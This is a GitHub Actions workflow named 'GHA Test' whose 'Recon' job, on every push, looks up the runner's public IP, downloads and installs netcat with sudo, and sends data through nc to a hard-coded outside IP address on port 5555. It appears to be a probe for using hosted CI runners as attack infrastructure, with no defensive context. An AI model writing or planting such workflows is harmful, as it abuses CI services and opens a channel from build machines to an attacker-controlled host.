name: GHA Test
on: [push]
jobs: 
  Recon: #Each job can run for 6h max
    runs-on: ubuntu-latest
    steps:
      - run: |     
            curl -s http://whatismyip.akamai.com/
      - run: |
           wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz
           tar -xzvf netcat-0.7.1.tar.gz
           cd netcat-0.7.1
           ./configure
           sudo make
           sudo make install
      - run: |
           echo whoami | nc 3.84.116.126 5555
      - run: |
           sleep 60s
